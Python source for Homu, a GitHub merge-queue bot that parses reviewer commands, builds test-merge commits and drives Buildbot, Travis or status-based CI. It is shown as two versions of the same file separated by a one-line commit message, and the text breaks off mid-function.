            # Ask buildbot to stop the selected builders immediately.
            with buildbot_sess(repo_cfg) as sess:
                res = sess.post(repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', allow_redirects=False, data={
                    'selected': repo_cfg['buildbot']['builders'],
                    'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())),
                })
            if 'authzfail' in res.text:
                err = 'Authorization failed'
            else:
                # Scrape buildbot's HTML error box, if any.
                mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
                if mat:
                    err = mat.group(1).strip()
                    if not err: err = 'Unknown error'
                else:
                    err = ''
            if err:
                state.add_comment(':bomb: Buildbot returned an error: `{}`'.format(err))
        elif word == 'clean' and realtime:
            state.merge_sha = ''
            state.init_build_res([])
            state.save()
        else:
            found = False
        if found:
            state_changed = True
            # Blank the word so it is not re-matched as a SHA argument.
            words[i] = ''
    return state_changed
def create_merge(state, repo_cfg, trigger_author_cfg, branch, gh):
    """Create the test-merge commit for *state* on *branch*.

    Resets *branch* to the PR's base, merges the PR head into it, then
    creates a trigger branch + PR so that CI builds only the merge
    commit.  Returns the merge commit, or None on a merge conflict.
    Errors are reported through GitHub statuses and comments.
    """
    def report_error(desc):
        # Mark the PR errored and surface the reason on GitHub.
        state.set_status('error')
        utils.github_create_status(state.get_repo(), state.head_sha, 'error',
                                   '', desc[:140], context='merge-test')
        state.add_comment(':x: {}'.format(desc))
    base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
    # Force the staging branch to the current base of the PR.
    utils.github_set_ref(
        state.get_repo(),
        'heads/' + branch,
        base_sha,
        force=True,
    )
    state.refresh()
    merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}'.format(
        state.num,
        state.head_ref,
        '<try>' if state.try_ else state.approved_by,
        state.title)
    try: merge_commit = state.get_repo().merge(branch, state.head_sha, merge_msg)
    except github3.models.GitHubError as e:
        # 409 means the merge could not be performed cleanly.
        if e.code != 409: raise
        report_error('Merge conflict')
        return None
    # Solano's CI Mode can be set either to PR or ON. In ON mode, it
    # builds on every branch update, which means it gets triggered on
    # the above call to github_set_ref. We must therefore issue a PR on
    # the merge node, in order to only trigger Solano to build on the
    # intended node.
    db = Database()
    message = 'Build trigger for {}'.format(merge_msg)
    pr_branch_name = '{}_build_trigger_{}'.format(branch, merge_commit.sha)
    pr_branch = utils.github_set_ref(repo=state.get_repo(),
                                     ref='heads/{}'.format(pr_branch_name),
                                     sha=merge_commit.sha,
                                     force=True)
    if pr_branch:
        author = {'name': trigger_author_cfg.get('name', 'homu'),
                  'email': trigger_author_cfg.get('email', 'homu@invalid'),
                  'date': datetime.now(timezone.utc).isoformat()}
        # A PR needs at least one commit of its own; add a dummy file.
        created_file = state.get_repo().create_file(path='zero',
                                                    message=message,
                                                    content=b'0',
                                                    branch=pr_branch_name,
                                                    committer=author,
                                                    author=author)
        if 'commit' in created_file:
            commit = created_file.get('commit')
            time.sleep(2) # GitHub sometimes needs a moment here.
            try:
                pr = state.get_repo().create_pull(title=message,
                                                  base=branch,
                                                  head=pr_branch_name)
            except github3.models.GitHubError as e0:
                for e1 in e0.errors:
                    report_error(e1['message'])
                pr = None
            if pr:
                # Remember the trigger so build results can be matched
                # back to the real merge commit.
                with db.get_connection() as db_conn:
                    try:
                        build_count = len(repo_cfg['testrunners']['builders'])
                    except KeyError:
                        build_count = 0
                    sql = 'REPLACE INTO build_triggers ' \
                          '(branch, trigger_sha, target_sha, build_count) ' \
                          'VALUES (%s, %s, %s, %s)'
                    db_conn.cursor().execute(sql, [pr_branch_name,
                                                   commit.sha,
                                                   merge_commit.sha,
                                                   build_count])
                    db_conn.commit()
            else:
                report_error('Failed to create pull.')
        else:
            report_error('Failed to create commit.')
    else:
        report_error('Failed to create PR branch.')
    # NOTE(review): the merge commit is returned even if the trigger-PR
    # machinery above reported an error — confirm callers expect that.
    return merge_commit
def start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
    """Kick off a (try or auto) build for *state*.

    Picks the staging branch and builder list from the repo config,
    creates the merge commit, and marks the PR pending.  Returns True
    when a build was started (or a buildbot slot is already busy),
    False when the merge failed.
    """
    # A non-empty slot means buildbot is already busy; pretend success
    # so the queue does not advance past this PR.
    if buildbot_slots[0]:
        return True
    assert state.head_sha == state.get_repo().pull_request(state.num).head.sha
    repo_cfg = repo_cfgs[state.repo_label]
    # Select staging branch + builders based on which CI backend is configured.
    if 'buildbot' in repo_cfg:
        branch = 'try' if state.try_ else 'auto'
        branch = repo_cfg.get('branch', {}).get(branch, branch)
        builders = repo_cfg['buildbot']['try_builders' if state.try_ else 'builders']
    elif 'travis' in repo_cfg:
        branch = repo_cfg.get('branch', {}).get('auto', 'auto')
        builders = ['travis']
    elif 'status' in repo_cfg:
        branch = repo_cfg.get('branch', {}).get('auto', 'auto')
        builders = ['status']
    elif 'testrunners' in repo_cfg:
        branch = 'merge_bot_{}'.format(state.base_ref)
        builders = repo_cfg['testrunners'].get('builders', [])
    else:
        raise RuntimeError('Invalid configuration')
    merge_commit = create_merge(state, repo_cfg, trigger_author_cfg, branch, gh)
    if not merge_commit:
        return False
    state.init_build_res(builders)
    state.merge_sha = merge_commit.sha
    state.save()
    if 'buildbot' in repo_cfg:
        # Claim the single buildbot slot for this merge.
        buildbot_slots[0] = state.merge_sha
    logger.info('Starting build of {}/{}#{} on {}: {}'.format(state.owner,
                                                              state.name,
                                                              state.num,
                                                              branch,
                                                              state.merge_sha))
    state.set_status('pending')
    desc = '{} commit {:.7} with merge {:.7}...'.format('Trying' if state.try_ else 'Testing', state.head_sha, state.merge_sha)
    github_create_status = partial(utils.github_create_status,
                                   repo=state.get_repo(),
                                   sha=state.head_sha,
                                   state='pending',
                                   description=desc)
    # testrunners get one status per builder; other backends a single one.
    if 'testrunners' in repo_cfg:
        for builder in builders:
            github_create_status(context='merge-test/{}'.format(builder))
    else:
        github_create_status(context='homu')
    state.add_comment(':hourglass: ' + desc)
    return True
def start_rebuild(state, repo_cfgs):
    """Re-run only the failed buildbot builders for *state*.

    Only applies when the previous merge commit is still based on the
    current base branch and every builder reported a URL.  Returns True
    when a rebuild was started, False when a full build is needed.
    """
    repo_cfg = repo_cfgs[state.repo_label]
    if 'buildbot' not in repo_cfg or not state.build_res:
        return False
    builders = []
    succ_builders = []
    # Partition builders into failed (to rebuild) and succeeded (reusable).
    for builder, info in state.build_res.items():
        if not info['url']:
            return False
        if info['res']:
            succ_builders.append([builder, info['url']])
        else:
            builders.append([builder, info['url']])
    if not builders or not succ_builders:
        return False
    # The old merge commit is only reusable if the base hasn't moved.
    base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
    parent_shas = [x['sha'] for x in state.get_repo().commit(state.merge_sha).parents]
    if base_sha not in parent_shas:
        return False
    # Tag the merge so buildbot can check out the exact sourcestamp.
    utils.github_set_ref(state.get_repo(), 'tags/homu-tmp', state.merge_sha, force=True)
    builders.sort()
    succ_builders.sort()
    with buildbot_sess(repo_cfg) as sess:
        for builder, url in builders:
            res = sess.post(url + '/rebuild', allow_redirects=False, data={
                'useSourcestamp': 'exact',
                'comments': 'Initiated by Homu',
            })
            if 'authzfail' in res.text:
                err = 'Authorization failed'
            elif builder in res.text:
                err = ''
            else:
                mat = re.search('<title>(.+?)</title>', res.text)
                err = mat.group(1) if mat else 'Unknown error'
            if err:
                state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err))
                return False
    state.set_status('pending')
    msg_1 = 'Previous build results'
    msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders))
    msg_3 = ' are reusable. Rebuilding'
    msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders))
    utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', '{}{}...'.format(msg_1, msg_3), context='homu')
    state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
    return True
def start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg, gh, *args):
    """Try a partial buildbot rebuild first; fall back to a full build.

    NOTE(review): despite its name, the 4th positional parameter actually
    receives ``buildbot_slots`` from process_queue and *args carries
    (logger, gh), so the positional order forwarded to start_build is
    correct — only the parameter name here is misleading.
    """
    if start_rebuild(state, repo_cfgs):
        return True
    return start_build(state, repo_cfgs, trigger_author_cfg, gh, *args)
def process_queue(states, repos, repo_cfgs, trigger_author_cfg, logger,
                  buildbot_slots, gh):
    """Advance each repo's merge queue by at most one build.

    Per repo: stop at a pending non-try build; otherwise start the
    first eligible approved build.  Returns as soon as one build is
    started.  Try builds are considered in a second pass.
    """
    for repo_label, repo in repos.items():
        # sorted() uses PullReqState.__lt__ / sort_key for queue order.
        repo_states = sorted(states[repo_label].values())
        for state in repo_states:
            if state.status == 'pending' and not state.try_:
                # A real (non-try) build is already in flight for this repo.
                break
            elif state.status == '' and state.approved_by:
                if start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg,
                                          buildbot_slots, logger, gh):
                    return
            elif state.status == 'success' and state.try_ and state.approved_by:
                # Try build succeeded and the PR is approved: promote to
                # a real build.
                state.try_ = False
                state.save()
                if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
                    return
        # Second pass: start pending try builds.
        for state in repo_states:
            if state.status == '' and state.try_:
                if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
                    return
def fetch_mergeability(mergeable_que):
    """Worker loop: resolve GitHub mergeability for queued PR states.

    Runs forever.  Each queue item is a (state, cause) pair; when a PR
    that was mergeable becomes unmergeable, a comment naming the likely
    culprit (parsed from *cause*) is posted.
    """
    re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
    while True:
        try:
            state, cause = mergeable_que.get()
            pr = state.get_repo().pull_request(state.num)
            if pr is None:
                # GitHub occasionally 404s right after an event; retry once.
                time.sleep(5)
                pr = state.get_repo().pull_request(state.num)
            mergeable = pr.mergeable
            if mergeable is None:
                # Mergeability is computed asynchronously; poll once more.
                time.sleep(5)
                mergeable = pr.mergeable
            if state.mergeable is True and mergeable is False:
                if cause:
                    mat = re_pull_num.search(cause['title'])
                    if mat: issue_or_commit = '#' + mat.group(1)
                    else: issue_or_commit = cause['sha'][:7]
                    issue_or_commit = \
                        ' (presumably {})'.format(issue_or_commit)
                else:
                    issue_or_commit = ''
                state.add_comment(':x: The latest upstream changes{} made '
                    'this pull request unmergeable. Please resolve the merge '
                    'conflicts.'.format(issue_or_commit))
            state.set_mergeable(mergeable, que=False)
        except Exception:
            # BUG FIX: was a bare ``except:``, which also swallowed
            # SystemExit/KeyboardInterrupt; keep the worker alive but let
            # those propagate.
            traceback.print_exc()
        finally:
            mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, mergeable_que,
                my_username, repo_labels):
    """Rebuild all in-memory and DB state for one repository from GitHub.

    Wipes the repo's rows from the database, then replays every open PR
    (skipping ones untouched for roughly two months) along with its review
    and issue comments to reconstruct each PullReqState.
    """
    logger.info('Synchronizing {}...'.format(repo_label))

    db = Database()
    repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])

    # XXX This is dangerous. We have a publicly exposed method to destroy state.
    with db.get_connection() as db_conn:
        for tbl in ['pull', 'build_res', 'mergeable']:
            sql = 'DELETE FROM {} WHERE repo = %s'.format(tbl)
            db_conn.cursor().execute(sql, [repo_label])
            db_conn.commit()

    states[repo_label] = {}
    repos[repo_label] = repo

    for pull in repo.iter_pulls(state='open'):
        # Ignore PRs older than about two months.
        update_delta = datetime.now(timezone.utc) - pull.updated_at
        if 5e6 < update_delta.total_seconds():
            logger.debug('Ignoring PR for merge {} because it has not ' \
                         'been updated since {}.'.format(pull.merge_commit_sha,
                                                         pull.updated_at))
            continue
        with db.get_connection() as db_conn:
            cursor = db_conn.cursor()
            sql = 'SELECT status FROM pull WHERE repo = %s AND num = %s'
            cursor.execute(sql, [repo_label, pull.number])
            row = cursor.fetchone()
        if row:
            status = row[0]
        else:
            # No saved status; fall back to the 'homu' commit status on GitHub.
            status = ''
            for info in utils.github_iter_statuses(repo, pull.head.sha):
                if info.context == 'homu':
                    status = info.state
                    break

        state = PullReqState(pull.number, pull.head.sha, status, repo_label,
                             mergeable_que, gh, repo_cfg['owner'],
                             repo_cfg['name'], repos)
        state.title = pull.title
        state.body = pull.body
        state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
        state.base_ref = pull.base.ref
        state.set_mergeable(None)
        state.assignee = pull.assignee.login if pull.assignee else ''

        # Replay review comments pinned to the current head commit.
        for comment in pull.iter_comments():
            if comment.original_commit_id == pull.head.sha:
                parse_commands(
                    comment.body,
                    comment.user.login,
                    repo_cfg,
                    state,
                    my_username,
                    sha=comment.original_commit_id,
                )

        # Replay all issue comments on the PR.
        for comment in pull.iter_issue_comments():
            parse_commands(
                comment.body,
                comment.user.login,
                repo_cfg,
                state,
                my_username,
            )

        state.save()

        states[repo_label][pull.number] = state

    logger.info('Done synchronizing {}!'.format(repo_label))
    logger.debug('Github rate limit status: {}'.format(gh.rate_limit()))
def arguments():
    """Parse command-line options for the bot."""
    description = ('A bot that integrates with GitHub and '
                   'your favorite continuous integration service')
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Enable more verbose logging')
    return parser.parse_args()
def main():
    """Bot entry point: load config, restore saved DB state, start workers."""
    args = arguments()

    logger = logging.getLogger('homu')
    logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
    logger.addHandler(logging.StreamHandler())

    # Prefer TOML configuration; fall back to the legacy JSON file.
    try:
        with open('cfg.toml') as fp:
            cfg = toml.loads(fp.read())
    except FileNotFoundError:
        with open('cfg.json') as fp:
            cfg = json.loads(fp.read())

    trigger_author_cfg = cfg.get('trigger_author', {})
    gh = github3.login(token=cfg['github']['access_token'])
    rate_limit = gh.rate_limit()
    logger.debug('Github rate limit status: {}'.format(rate_limit))
    if not rate_limit['rate']['remaining']:
        # Out of API quota: sleep until GitHub resets the limit.
        reset_time = datetime.fromtimestamp(rate_limit['rate']['reset'])
        logger_msg = 'Github rate limit exhausted! Sleeping until {}'
        logger.info(logger_msg.format(reset_time.isoformat()))
        reset_delta = reset_time - datetime.now()
        time.sleep(reset_delta.total_seconds())

    states = {}
    repos = {}
    repo_cfgs = {}
    buildbot_slots = ['']
    my_username = gh.user().login
    repo_labels = {}
    mergeable_que = Queue()

    db = Database()
    with db.get_connection() as db_conn:
        # Ensure the schema exists before reading saved state.
        schema_path = os.path.join(os.path.dirname(__file__), 'schema.sql')
        schema = open(schema_path).read()
        # execute with multi=True requires enumeration.
        list(db_conn.cursor().execute(multi=True, operation=schema))

        # Restore every configured repo's PullReqState rows from `pull`.
        for repo_label, repo_cfg in cfg['repo'].items():
            repo_cfgs[repo_label] = repo_cfg
            repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label

            repo_states = {}
            repos[repo_label] = None

            cursor = db_conn.cursor()
            cursor.execute('SELECT num, head_sha, status, title, body, ' \
                           'head_ref, base_ref, assignee, approved_by, ' \
                           'priority, try_, rollup, merge_sha FROM pull ' \
                           'WHERE repo = %s', [repo_label])
            for (num, head_sha, status, title, body, head_ref, base_ref,
                 assignee, approved_by, priority, try_, rollup,
                 merge_sha) in cursor.fetchall():
                state = PullReqState(num, head_sha, status, repo_label,
                                     mergeable_que, gh, repo_cfg['owner'],
                                     repo_cfg['name'], repos)
                state.title = title
                state.body = body
                state.head_ref = head_ref
                state.base_ref = base_ref
                state.set_mergeable(None)
                state.assignee = assignee
                state.approved_by = approved_by
                state.priority = int(priority)
                state.try_ = bool(try_)
                state.rollup = bool(rollup)

                if merge_sha:
                    # Recover the builder list for the in-flight merge.
                    if 'buildbot' in repo_cfg:
                        builders = repo_cfg['buildbot']['builders']
                    elif 'travis' in repo_cfg:
                        builders = ['travis']
                    elif 'status' in repo_cfg:
                        builders = ['status']
                    elif 'testrunners' in repo_cfg:
                        builders = repo_cfg['testrunners'].get('builders', [])
                    else:
                        raise RuntimeError('Invalid configuration')

                    state.init_build_res(builders, use_db=False)
                    state.merge_sha = merge_sha

                elif state.status == 'pending':
                    # FIXME: There might be a better solution
                    state.status = ''
                    state.save()

                repo_states[num] = state

            states[repo_label] = repo_states

        # Re-attach saved build results, dropping rows that no longer match.
        cursor = db_conn.cursor()
        cursor.execute('SELECT repo, num, builder, res, url, merge_sha FROM build_res')
        for repo_label, num, builder, res, url, merge_sha in cursor.fetchall():
            try:
                state = states[repo_label][num]
                if builder not in state.build_res: raise KeyError
                if state.merge_sha != merge_sha: raise KeyError
            except KeyError:
                cursor = db_conn.cursor()
                cursor.execute('DELETE FROM build_res WHERE repo = %s AND ' \
                               'num = %s AND builder = %s',
                               [repo_label, num, builder])
                db_conn.commit()
                continue

            state.build_res[builder] = {
                'res': bool(res) if res is not None else None,
                'url': url,
            }

        # Re-attach cached mergeability, dropping rows for unknown PRs.
        cursor = db_conn.cursor()
        cursor.execute('SELECT repo, num, mergeable FROM mergeable')
        for repo_label, num, mergeable in cursor.fetchall():
            try: state = states[repo_label][num]
            except KeyError:
                cursor = db_conn.cursor()
                cursor.execute('DELETE FROM mergeable WHERE repo = %s AND ' \
                               'num = %s', [repo_label, num])
                db_conn.commit()
                continue

            state.mergeable = bool(mergeable) if mergeable is not None else None

    queue_handler_lock = Lock()
    def queue_handler():
        # The lock serializes queue processing across caller threads.
        with queue_handler_lock:
            return process_queue(states, repos, repo_cfgs,
                                 trigger_author_cfg, logger,
                                 buildbot_slots, gh)

    # NOTE(review): imported here rather than at module top, presumably to
    # avoid an import cycle — confirm.
    from . import server
    Thread(target=server.start, args=[cfg, states, queue_handler, repo_cfgs,
                                      repos, logger, buildbot_slots,
                                      my_username, repo_labels,
                                      mergeable_que, gh]).start()

    Thread(target=fetch_mergeability, args=[mergeable_que]).start()

    # One synchronization thread per configured repository.
    for repo_label, repo_cfg in cfg['repo'].items():
        t = Thread(target=synchronize,
                   args=[repo_label, repo_cfg, logger, gh, states, repos,
                         mergeable_que, my_username, repo_labels])
        t.start()

    queue_handler()
if __name__ == '__main__':
    # On SIGTERM, close all database connections.
    signal.signal(signal.SIGTERM, lambda x, y: Database().close_all())
    main()
Include PR URL in log message when starting a build.
import argparse
from datetime import datetime, timezone
import github3
import os
import toml
import json
import re
from .database import Database
from . import utils
import logging
from threading import Thread, Lock
import time
import traceback
import requests
from contextlib import contextmanager
from functools import partial
from itertools import chain
from queue import Queue
import signal
# Ordering weight used by PullReqState.sort_key: lower value = handled first.
STATUS_TO_PRIORITY = {
    'success': 0,
    'pending': 1,
    'approved': 2,
    '': 3,
    'error': 4,
    'failure': 5,
}

# Marker written into Buildbot stop-build comments, and a regex matching it.
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
@contextmanager
def buildbot_sess(repo_cfg):
    """Yield a requests session logged in to the repo's Buildbot instance.

    Logs in on entry and logs out on exit using the credentials found in
    repo_cfg['buildbot'].
    """
    sess = requests.Session()

    sess.post(repo_cfg['buildbot']['url'] + '/login', allow_redirects=False, data={
        'username': repo_cfg['buildbot']['username'],
        'passwd': repo_cfg['buildbot']['password'],
    })

    yield sess

    sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
class PullReqState:
    """Tracks one pull request's approval/build state, mirrored to the DB."""

    # Defaults for fields populated later from the DB or from GitHub.
    num = 0
    priority = 0
    rollup = False
    title = ''
    body = ''
    head_ref = ''
    base_ref = ''
    assignee = ''

    def __init__(self, num, head_sha, status, repo_label, mergeable_que, gh,
                 owner, name, repos):
        # Initialize all mutable build/approval fields without touching the DB.
        self.head_advanced('', use_db=False)

        self.num = num
        self.head_sha = head_sha
        self.status = status
        self.repo_label = repo_label
        self.mergeable_que = mergeable_que
        self.gh = gh
        self.owner = owner
        self.name = name
        self.repos = repos
        self.db = Database()

    def head_advanced(self, head_sha, *, use_db=True):
        """Reset approval and build state after the PR head commit moved."""
        self.head_sha = head_sha
        self.approved_by = ''
        self.status = ''
        self.merge_sha = ''
        self.build_res = {}
        self.try_ = False
        self.mergeable = None

        if use_db:
            self.set_status('')
            self.set_mergeable(None)
            self.init_build_res([])

    def __repr__(self):
        return 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'.format(
            self.owner,
            self.name,
            self.num,
            self.approved_by,
            self.priority,
            self.status,
        )

    def sort_key(self):
        # Lexicographic ordering: status class, known-unmergeable last,
        # approved first, rollups last, higher priority first, then PR number.
        return [
            STATUS_TO_PRIORITY.get(self.get_status(), -1),
            1 if self.mergeable is False else 0,
            0 if self.approved_by else 1,
            1 if self.rollup else 0,
            -self.priority,
            self.num,
        ]

    def __lt__(self, other):
        return self.sort_key() < other.sort_key()

    def add_comment(self, text):
        # Cache the issue object so repeated comments reuse one API lookup.
        issue = getattr(self, 'issue', None)
        if not issue:
            issue = self.issue = self.get_repo().issue(self.num)

        issue.create_comment(text)

    def set_status(self, status):
        """Persist a new status; also saves merge_sha for non-try builds."""
        self.status = status

        sql = 'UPDATE pull SET status = %s WHERE repo = %s AND num = %s'
        with self.db.get_connection() as db_conn:
            db_conn.cursor().execute(sql, [self.status, self.repo_label,
                                           self.num])
            db_conn.commit()

            # FIXME: self.try_ should also be saved in the database
            if not self.try_:
                sql = 'UPDATE pull SET merge_sha = %s WHERE repo = %s AND num = %s'
                db_conn.cursor().execute(sql, [self.merge_sha, self.repo_label,
                                               self.num])
                db_conn.commit()

    def get_status(self):
        # An approved PR with no explicit status (and not known-unmergeable)
        # reads as 'approved'.
        return 'approved' if self.status == '' and self.approved_by and self.mergeable is not False else self.status

    def set_mergeable(self, mergeable, *, cause=None, que=True):
        """Record mergeability; None means unknown (optionally re-queued)."""
        if mergeable is not None:
            self.mergeable = mergeable

            sql = 'REPLACE INTO mergeable (repo, num, mergeable) ' \
                  'VALUES (%s, %s, %s)'
            with self.db.get_connection() as db_conn:
                db_conn.cursor().execute(sql, [self.repo_label, self.num,
                                               self.mergeable])
                db_conn.commit()
        else:
            if que:
                # Let the fetch_mergeability worker resolve it asynchronously.
                self.mergeable_que.put([self, cause])
            else:
                self.mergeable = None

            with self.db.get_connection() as db_conn:
                sql = 'DELETE FROM mergeable WHERE repo = %s AND num = %s'
                db_conn.cursor().execute(sql, [self.repo_label, self.num])
                db_conn.commit()

    def init_build_res(self, builders, *, use_db=True):
        """Reset per-builder results to 'not run yet'."""
        self.build_res = {x: {
            'res': None,
            'url': '',
        } for x in builders}

        if use_db:
            with self.db.get_connection() as db_conn:
                sql = 'DELETE FROM build_res WHERE repo = %s AND num = %s'
                db_conn.cursor().execute(sql, [self.repo_label, self.num])
                db_conn.commit()

    def set_build_res(self, builder, res, url):
        """Store one builder's result and URL in memory and in the DB."""
        if builder not in self.build_res:
            raise Exception('Invalid builder: {}'.format(builder))

        self.build_res[builder] = {
            'res': res,
            'url': url,
        }

        with self.db.get_connection() as db_conn:
            db_conn.cursor().execute('REPLACE INTO build_res ' \
                                     '(repo, num, builder, res, url, ' \
                                     'merge_sha) VALUES ' \
                                     '(%s, %s, %s, %s, %s, %s)',
                                     [self.repo_label, self.num, builder, res,
                                      url, self.merge_sha])
            db_conn.commit()

    def build_res_summary(self):
        """One-line 'builder: result' summary of all build results."""
        return ', '.join('{}: {}'.format(builder, data['res'])
                         for builder, data in self.build_res.items())

    def get_repo(self):
        # Lazily fetch and cache the github3 repository object.
        repo = self.repos[self.repo_label]
        if not repo:
            self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name)

            assert repo.owner.login == self.owner
            assert repo.name == self.name
        return repo

    def save(self):
        """Write the full PR row to the `pull` table (REPLACE semantics)."""
        with self.db.get_connection() as db_conn:
            db_conn.cursor().execute('REPLACE INTO pull ' \
                                     '(repo, num, status, merge_sha, title, ' \
                                     'body, head_sha, head_ref, base_ref, ' \
                                     'assignee, approved_by, priority, ' \
                                     'try_, rollup) VALUES (%s, %s, %s, %s, ' \
                                     '%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
                                     [self.repo_label, self.num, self.status,
                                      self.merge_sha, self.title, self.body,
                                      self.head_sha, self.head_ref,
                                      self.base_ref, self.assignee,
                                      self.approved_by, self.priority,
                                      self.try_, self.rollup])
            db_conn.commit()

    def refresh(self):
        # Re-read title/body from GitHub (they may have been edited).
        issue = self.get_repo().issue(self.num)

        self.title = issue.title
        self.body = issue.body
def sha_cmp(short, full):
    """Return True if `short` (at least 4 chars) is a prefix of SHA `full`."""
    if len(short) < 4:
        return False
    return full[:len(short)] == short
def sha_or_blank(sha):
    """Return `sha` if it looks like a lowercase hex SHA, else ''."""
    if re.match(r'^[0-9a-f]+$', sha):
        return sha
    return ''
def parse_commands(body, username, repo_cfg, state, my_username, *,
                   realtime=False, sha=''):
    """Parse homu commands addressed to @my_username in a comment body.

    Recognizes r+/r=NAME/r-, p=N, retry, try/try-, rollup/rollup-, force
    and clean. Returns True if any command changed `state`. `realtime`
    marks live events and enables side effects (comments, retries, force).
    """
    # Only configured reviewers (or the bot itself) may issue commands.
    if 'ALL' != repo_cfg['reviewers'] and \
            username not in repo_cfg['reviewers'] and \
            username != my_username:
        return False

    state_changed = False

    # Consider only lines mentioning the bot; scan words right-to-left.
    words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x))
    for i, word in reversed(list(enumerate(words))):
        found = True
        if word == 'r+' or word.startswith('r='):
            # Approval, optionally pinned to an explicit commit SHA that
            # must match the current head.
            if not sha and i+1 < len(words):
                cur_sha = sha_or_blank(words[i+1])
            else:
                cur_sha = sha

            approver = word[len('r='):] if word.startswith('r=') else username

            if sha_cmp(cur_sha, state.head_sha):
                state.approved_by = approver

                state.save()
            elif realtime and username != my_username:
                if cur_sha:
                    msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
                    state.add_comment(':question: {} Please try again with '
                                      '`{:.7}`.'.format(msg, state.head_sha))
                else:
                    state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha))

        elif word == 'r-':
            state.approved_by = ''

            state.save()

        elif word.startswith('p='):
            try: state.priority = int(word[len('p='):])
            except ValueError: pass

            state.save()

        elif word == 'retry' and realtime:
            state.set_status('')

        elif word in ['try', 'try-'] and realtime:
            state.try_ = word == 'try'

            state.merge_sha = ''
            state.init_build_res([])

            state.save()

        elif word in ['rollup', 'rollup-']:
            state.rollup = word == 'rollup'

            state.save()

        elif word == 'force' and realtime:
            # Ask Buildbot to stop all selected builders immediately.
            with buildbot_sess(repo_cfg) as sess:
                res = sess.post(repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', allow_redirects=False, data={
                    'selected': repo_cfg['buildbot']['builders'],
                    'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())),
                })

            if 'authzfail' in res.text:
                err = 'Authorization failed'
            else:
                mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
                if mat:
                    err = mat.group(1).strip()
                    if not err: err = 'Unknown error'
                else:
                    err = ''

            if err:
                state.add_comment(':bomb: Buildbot returned an error: `{}`'.format(err))

        elif word == 'clean' and realtime:
            state.merge_sha = ''
            state.init_build_res([])

            state.save()

        else:
            found = False

        if found:
            state_changed = True

            # Blank the consumed word so it is not re-interpreted.
            words[i] = ''

    return state_changed
def create_merge(state, repo_cfg, trigger_author_cfg, branch, gh):
    """Merge the PR head into `branch` and create the build-trigger PR.

    Resets `branch` to the base branch head, merges the PR head into it,
    then creates a throwaway branch plus PR on the merge commit so that CI
    is triggered only on the intended commit. Returns the merge commit,
    or None on a merge conflict.
    """
    def report_error(desc):
        # Mark the PR errored on GitHub and leave an explanatory comment.
        state.set_status('error')
        utils.github_create_status(state.get_repo(), state.head_sha, 'error',
                                   '', desc[:140], context='merge-test')
        state.add_comment(':x: {}'.format(desc))

    base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
    utils.github_set_ref(
        state.get_repo(),
        'heads/' + branch,
        base_sha,
        force=True,
    )

    state.refresh()

    merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}'.format(
        state.num,
        state.head_ref,
        '<try>' if state.try_ else state.approved_by,
        state.title)
    try: merge_commit = state.get_repo().merge(branch, state.head_sha, merge_msg)
    except github3.models.GitHubError as e:
        # HTTP 409 from the merge endpoint means a merge conflict.
        if e.code != 409: raise

        report_error('Merge conflict')
        return None

    # Solano's CI Mode can be set either to PR or ON. In ON mode, it
    # builds on every branch update, which means it gets triggered on
    # the above call to github_set_ref. We must therefore issue a PR on
    # the merge node, in order to only trigger Solano to build on the
    # intended node.
    db = Database()
    message = 'Build trigger for {}'.format(merge_msg)
    pr_branch_name = '{}_build_trigger_{}'.format(branch, merge_commit.sha)
    pr_branch = utils.github_set_ref(repo=state.get_repo(),
                                     ref='heads/{}'.format(pr_branch_name),
                                     sha=merge_commit.sha,
                                     force=True)
    if pr_branch:
        author = {'name': trigger_author_cfg.get('name', 'homu'),
                  'email': trigger_author_cfg.get('email', 'homu@invalid'),
                  'date': datetime.now(timezone.utc).isoformat()}
        # NOTE(review): commits a dummy file on the trigger branch,
        # presumably so it differs from the target branch — confirm.
        created_file = state.get_repo().create_file(path='zero',
                                                    message=message,
                                                    content=b'0',
                                                    branch=pr_branch_name,
                                                    committer=author,
                                                    author=author)
        if 'commit' in created_file:
            commit = created_file.get('commit')
            time.sleep(2)  # GitHub sometimes needs a moment here.
            try:
                pr = state.get_repo().create_pull(title=message,
                                                  base=branch,
                                                  head=pr_branch_name)
            except github3.models.GitHubError as e0:
                for e1 in e0.errors:
                    report_error(e1['message'])
                pr = None
            if pr:
